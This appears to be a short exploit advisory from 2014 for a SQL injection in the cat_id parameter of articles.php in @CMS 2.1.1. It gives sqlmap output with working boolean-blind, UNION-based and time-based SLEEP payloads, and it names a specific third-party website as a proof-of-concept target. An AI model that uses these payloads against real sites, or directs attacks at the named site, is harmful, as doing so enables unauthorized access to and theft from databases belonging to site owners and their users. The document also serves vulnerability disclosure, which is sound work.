@CMS version 2.1.1 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
e6854c856557d35be96b4420bd74f6f1855d65f1a97995aa9ed4e9ce797e38c4
# SQL Injection on @CMS 2.1.1 Stable
# Risk: High
# CWE number: CWE-89
# Date: 22/08/2014
# Vendor: www.atcode.net
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint
# Vulnerable File: articles.php
# Exploit: http://host/articles.php?cat_id=[SQLI]
# PoC: http://carla-columna.de/articles.php?cat_id=[SQLI]
--- "SQLi using sqlmap."---
Place: GET
Parameter: cat_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs
---
# Thank's